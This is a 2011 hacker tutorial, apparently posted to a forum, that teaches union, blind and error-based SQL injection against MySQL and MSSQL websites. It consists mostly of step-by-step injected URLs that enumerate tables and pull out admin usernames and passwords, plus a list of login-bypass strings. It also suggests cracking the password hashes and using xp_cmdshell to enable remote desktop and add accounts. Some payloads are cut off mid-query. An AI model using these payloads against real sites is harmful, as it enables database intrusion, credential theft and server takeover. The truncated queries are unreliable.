Full Sql Injection Tutorial - Mysql + Mssql

#####################################################################
# Title: Advanced Sql Injection including Mysql,Mssql & a guide to oracle
# Date : 22 January 2011
# Author: Cyb3R_ShubhaM aKa L0c4lr00T
# Email: l0c4lr00t@yahoo.in
# Facebook: fb[dot]me/yoShubH
# My Teams : Indishell,IW,AoH,SWATS,Team StuXnet etc.


# Contents-
=> Mysql- Blind + union
=> Mssql- Blind + Union + error based
// => For oracle plz refer to- http://dl.packetstormsecurity.net/papers..._Web_2.pdf :)

# Suggested Automated tools-

=> Havij: itsecteamc.com

# Vulnerability scanners
=> Acunetix wvs
=> Jsky
================================================================================​==========
Hmmm... So Let's Start, I think it's my first paper being written for you all ;) I don't remember the exact definition of sql Injection so
I'll get that for you from google ;)

Q. What is Sql Injection ?
A. SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application.

I don't want to boar you ;) so a simple short definiton is above..

Types of Sql Injection-

# Blind
# Union
# Error //not availble in mysql

Google them to get the definitions :)..!

Injection types-

# String- http://test.com/index.php?id=1 having 1=1
# Integer- http://test.com/index.php?id='1 having 1=1

hope you can see the difference.

Server types I know & I'll teach you-

# Mysql
# Mssql

================================================================================​===========
################################################################################​###########

Let's start with Mysql:

Mysql has 2 types only as mentioned above.you need to know the following things about the DB you are attacking-

# Number of columns
# Table names
# column names

# Let's start with union Attack, the most common, every n00b should no it :p-

=> http://test.com/index.php?id=1 order by 10--

^ This gives me an error

Let's again try

=> http://test.com/index.php?id=1 order by 7--

^ This gives me an error

Let's try again

=> http://test.com/index.php?id=1 order by 5--

Whoa !! the page is Loading normally

It means, Number of columns => 5
you can do it with mssql as well.

# Now the next part-
I'm using union select statement.

=> http://test.com/index.php?id=1 union all select 1,2,3,4,5--
If it doesn't gives you anything, change the first part of the query to a negative value.

=> http://test.com/index.php?id=-1 union all select 1,2,3,4,5--

It'll show some number on you screen. In my case it is 2. Now we know that column 2 will echo data back to us. :D

# getting Mysql version

=> http://test.com/index.php?id=-1 union all select 1,@@version,3,4,5--
If you do not get with this try this-

=> http://test.com/index.php?id=-1 union select 1,version()),3,4,5--

Now you will get get the version name

it can be-

# 5+
# 5>

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Table extraction for version 5+ :

=> http://test.com/index.php?id=-1 union all select 1,group_concat(table_name),3,4,5 from information_schema.tables--

It'll show a lot of tables, if you want to get into the site, usually you need to get the admin's login info :D
So, In my case I need to exploit into a table named => admin

which contains information, I need :D

Now I got the Tables names & I need to extract the column names from them so the query will be-

=> http://test.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=admin--

This will show you the column names inside the table Admin. if it gives you an error you need to change the text value of admin to mysql char.
I use hackbar, a Firefox addon to do so.

so char of admin is =>CHAR(97, 100, 109, 105, 110)

therefore the query will be-

=> http://test.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

It show the columns names to me. In my case they are-

# user_name
# user_password
# sex
# uid

We only need to know username & pass so we reject the rest two. Okay ? :D

The next query will be for extracting the final data I need- :D

=> http://test.com/index.php?id=-1 union all select 1,group_concat(user_name,0x3a,user_password),3,4,5 from admin--

where 0x3a is the hex value of => :

VOILA !

I got the username & pass, it is => shubham:password

password can also be encrypted. So you can use few online decrypters or a software I know => Password Pro

This was all for Mysql 5+
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Let's Start with mysql 5>

Version 4 or below 5 does not contain any => Information_schema

so you have to guess them, Like people guess while playing KBC (who want to be a millionaire)
hahaha :D

we know the number of columns that is 5.
=> Let's Start guessing the table:

=> http://test.com/index.php?id=-1 union all select 1,2,3,4,5 from users--

^ This one gives me error

=> => http://test.com/index.php?id=-1 union all select 1,2,3,4,5 from Admin--

^ Voila I guessed the right, you must be thinking ShubhaM is a Genious xD :p


=> Next part is Guessing the columns:
as we had done earlier & had found the vulnerable column is 2...so lets process further.
guess something similar to a username.

=> http://test.com/index.php?id=-1 union all select 1,user,3,4,5 from admin--

^ got error. Retrying...

=> http://test.com/index.php?id=-1 union all select 1,username,3,4,5 from admin--

Hurray ! It gotta work baby & I got the username :D...!

=> let's guess the password column now

=> http://test.com/index.php?id=-1 union all select 1,pass,3,4,5 from admin--

^ got an error

one more try-

=> http://test.com/index.php?id=-1 union all select 1,password,3,4,5 from admin--

hahaha...got the pass !!!

This is the end of Mysql 5> union.

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX​XXXXXXXXXXXXXXXXXX

# Mysql Blind-

Most fu*king part. I really hate this. :X :P :X

Q. what is Blind Sql Injection ?
A. Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established.

^ copied it from wikipedia ;)
hope you understood. huh !! its 1:11am here in India...I'm very tired :'( :P :P but no school tommorow coz it is sunday :D

Let's come to the point, enough of fun now !!

# when we want to test for mysql blind-

=> http://test.com/news.php?id=5 and 1=1

^ this is always trues :D & page loads normally :))


=> http://test.com/news.php?id=5 and 1=2

^ this one is Fake :X

so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.

# Getting Mysql version in blind sqli-

to get the version in blind attack we use substring

i.e

=> http://test.com/news.php?id=5 and substring(@@version,1,1)=4

# this should return TRUE if the version of MySQL is 4.


# replace 4 with 5, and if query return TRUE then the version is 5.

# Test if subselect works

when select don't work then we use subselect

i.e

=> http://test.com/news.php?id=5 and (select 1)=1

# if page loads normally then subselects work.

Now, :D Let's see if we have access to => Mysql.user

=> http://test.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1

if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.

# Check table and column names

# This is part when guessing of the game KBC works :D :))

that is,

=> http://test.com/news.php?id=5 and (select 1 from users limit 0,1)=1
(with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)

# then if the page loads normally without content missing, the table users exits.


# if you get FALSE (some article missing), just change table name until you guess the right one :)

# let's say that I have found that table name is users, now what we need is column name !! :D

# The same as table name, we start guessing.

=> http://test.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

#if the page loads normally we know that column name is password (if we get false then try common names or just guess)

here we merge 1 with the column password, then substring returns the first character (,1,1)

# Pull data from database

I found table users i columns username password so I'm gonna pull characters from that.

=> http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

ok this here pulls the first character from first user in table users.
substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value

# and then compare it with simbol greater then > .
# so if the ascii char greater then 80, the page loads normally. (TRUE)

# keep trying until get false.

=> http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95


# we get TRUE, keep incrementing :D

=> http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98


TRUE again, higher :D

=> http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99


FALSE!!!
:D :D

# so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.


=>> then let's check the second character.

# http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99


# Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)

=> http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99


TRUE, the page loads normally, higher.

=> http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

# FALSE, lower number.

=> http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104


# TRUE, higher.

http://test.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

# FALSE!!!

# we know that the second character is char(105) and that is 'i'. We have 'ci' so far

# so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).

It is very very fucking boaring :P :'( :X

There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing everything manually,

cause that makes you better INJ3CT0R :D

Finishing this Mysql part here. :P :P
next is mssql :P

==
##
My head is paining like hell...I'll continue after few hours ;)
Lolz...I'm back after 24 hours :D
Mssql is the best part, I like it !! due to many reasons...everyn00b can't do it :P
I had learnt mssql injection from very good people like- Stranger(ICA),CWH Underground [www.milw0rm.com/author/1456] & a book given to be my friend d3c0mil3r etc.

# MSsql Injection-

Hope you know how to test sqli vulnerablity, So I'm leaving that part.

# Bypassing Authenctication- common for n00bs:

+--+
| ' or 1=1 -- |
| a' or 1=1 -- |
| " or 1=1 -- |
| a" or 1=1 -- |
| ' or 1=1 # |
| " or 1=1 # |
| or 1=1 -- |
| ' or 'x'='x |
| " or "x"="x |
| ') or ('x'='x |
| ") or ("x"="x |
| ' or username LIKE '%admin% |
+--+
| USERNAME: ' or 1/* |
| PASSWORD: */ =1 -- |
+--+
| USERNAME: admin' or 'a'='a |
| PASSWORD: '# |
+--+

=> Mssql Injection with Union Attacl:
I love Union <3
I've this site to test upon my power => http://test.com/news.asp?id=1

Ok, Let's Start-

# First find out the number of columns, counting one by one is boaring :P so I'll use "Hit & Trial Method", that I had learnt somewhere in Maths :D

ok. => http://test.com/news.asp?id=1 order by 6--

We'll hit, until we get a error like this one-

[error] Microsoft SQL Native Client error '80040e14'
The ORDER BY position number 5 is out of range of the number of items in the select list.
/showthread.asp, line 9
[/error]

again trying to hit,

=> http://test.com/news.asp?id=1 order by 4--

whoa !! worked :D

# Now I'll use union again-

=> http://test.com/news.asp?id=1 and 1=2 union select 11,22,33,44--

# We will see "11" or "22" or "33" or "44" appeared on some point in returned page.

WOW ! i found 44 on my laptop's screen, so i'll replace 44 with @@version

=> http://test.com/news.asp?id=1 and 1=2 union select 11,22,33,@@version--

^ So, this gives me the version Information.

Let's continue in grabbing the rest data, I'm using information_schema, as like we did in Mysql :P

I think concat do not works in mssql, never tried also, if working also, I don't know how to ! :P coz I'm just a 10th std student. No idea abt sql :P

So the next,

=> http://test.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,table_name from information_schema.tables--

^ this gives me the name of first table, i.e => threads

I'll use the first table to get the next one & so on...untill u get what u want

=> http://test.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,table_name from information_schema.tables where table_name not in ('threads')--

^ This gives me the name of the next table, i.e.=> users :D
Users is the required table for me which contains the info I need :D

=> http://test.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,column_name from information_schema.columns where table_name='users'--

^ this gives me the column name,i.e,uname. as we did to find the tables. same we'll do with columns. Ok? :)

=> http://test.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,column_name from information_schema.columns where table_name='users' and
column_name not in ('uname')--

^ this gives me the next column,i.e, upass :D

Lolz, now I need data from these two columns :D

=> http://site.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,uname from users--

^ same with upass

this time my uname is admin. so to find next row, we do

=> http://site.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,uname from users where uname not in ('admin')--

further as well, we can extract the rest of the data. hope you understood this much !!

Now next part is mssql blind :D

==

# Mssql blind :

# testing-

=> http://test.com/news.asp?id=1 and 1=1

another one => http://test.com/news.asp?id=1 and 1=2

If these two give different results that simply means that the fucking site is vulnerable to Mssql blind :D :P :x
# I'm copy pasting some queries from my notes :P :D

=> http://test.com/news.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90

^ your idea of picking the ascii code can be Different. :D :P

^ valid :(
hit it again-

http://test.com/news.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>120

^
in this case result will be like 1=2
next we try,

http://test.com/news.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>105

I tried with these-
# >112-Invalid
# >108-Valid
# >110-Invalid
# >109-Invalid

So therefore, ascii value is equal to => 109 :)

=> http://test.com/news.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)=109

Rest on your own...keep manipulating to get info :P

# Getting Table name- one of the hardest part, finding each character of table is really boaring :P
use automated tools for this :P the queries are very complicated here :x

Let's start-

=> http://test.com/news.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name)
FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55))
AS varchar(8000)),1,1)),0)>97

^ this one is used to get first character of first table.

second character:

=> http://test.com/news.asp?id-1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name)
FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55))
AS varchar(8000)),2,1)),0)>97

and so on....I'm not gonna dwell on it :P

# Getting column name-

=> http://test.com/news.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name)
FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55))
AS varchar(8000)),2,1)),0)>97

Change the table name to mssql char, example if it is users change it to-
char(117)+char(115)+char(101)+char(114)

# 2nd character-

=> http://test.com/news.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM
syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE
id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=1))AS varchar(8000)),2,1)),0)>97

& so on....Now finishing this mssql blind.

==

### Mssql Error based-
Types-
# ODBC Error Message Attack with "HAVING" and "GROUP BY"
# ODBC Error Message Attack with "CONVERT"
# Soap (not including soap in this paper)

Let's start with
# ODBC Error Message Attack with "HAVING" and "GROUP BY"--->

I'll inject having command now,

=> http://test.com/news.asp?id=1 having 1=1--

getting some error...err

[error]
Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_id' is invalid in
the select list because it is not contained in an aggreate function and there is no GROUP BY clause.
[/error]

it shows table name is news & one column => news_id is contained in it :P

# combining having & group by

=> http://test.com/news.asp?id=1 GROUP BY news.news_id HAVING 1=1--

[error]
Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_author' is invalid in
the select list because it is not contained in an aggreate function and there is no GROUP BY clause.
[/error]

it shows second column of first table is news_author :D

third column can be obtained using the 2nd one

=> http://test.com/news.asp?id=1 GROUP BY news.news_id,news.news_author HAVING 1=1--

[error]
Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_detail' is invalid in
the select list because it is not contained in an aggreate function and there is no GROUP BY clause.
[/error]

third column is => news_detail

and so on...

Now,

## ODBC Error Message Attack with "CONVERT"-

here I'll show you how to grab, MSSQL_Version, DB_name, User_name.

=> http://test.com/news.asp?id=1+and+1=conv...version)--

[error]

Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007
22:47:07 Copyright © 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
' to data type int.
/page.asp, line 9

[/error]

therefore I know => the version of MSSQL and OS (Windows 2003 Server)

other things u can grab by replacing @@version with-

# db_name()
# user_name()

if in the user name it gives => Sa

it means you can use Xp_cmdshell, that will I'll tell u later, to enable rdp i.e. remote desktop & hack the whole box :P :D

# Obtaining tables-

=> http://site.com/news.asp?id=1+and+1=conv...tables))--
Result is threads, so
Next one,

=> http://test.com/news.asp?id=1+and+1=conv...able_name+
not+in+('threads')))--

& so now...you can continue further now.

Next table for me is users that i founded using the threads one..! So now i need columns from the table threads, Okay ? :)

# Finding columns

=> http://test.com/news.asp?id=1+and+1=conv...users'))--

[error]
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'uname' to data type int.
/showthread.asp, line 9
[/error]

First column is Uname ;)

So I continue

=> http://test.com/news.asp?id=1+and+1=conv...e='users'+
and+column_name+not+in+('uname')))--

^ as we had done earlier :D

[error]
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'upass' to data type int.
/showthread.asp, line 9
[/error]

For getting more column names,
we only append a known table list like that in getting table names.

# extracting data

=> http://test.com/news.asp?id=1+and+1=conv...+users))--
[error]
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'admin' to data type int.
/page.asp, line 9
[/error]

same with upass ;)

Rest you are now on your own In mssql ;)
I'm leaving it here....it is much of done !!! now the thing left is that to use your brain. ;)

# Soap Injection-

Leaving this part :P I'll later make a paper on it ;)
end of MSsql ... :P

# Xp_cmdshell
I'd recommend to use some automated tools, I'm not in mood of writing on xp_cmdshell, though it consists of simple cmd commands to activate rdp & using net user u can add an account. but complicated queries.

==
##

# References-

# Hackforums.net
# Hackersbay.in
# Academyofhacking.com
# Indishell.in
# packetstormsecurity.org

##

Greetz To-
###

greetz- C00lt04d,Cyb3rgr00f,Reb0rn,c0d3br34k3r,3thicaln00b,Cyb3rS4m,g00gl3 w4rri0r & All my friends at AOH & Indishell.

special thanks- H4ck0lic, Bad Man :)

##3

End of this paper.

Ty ;)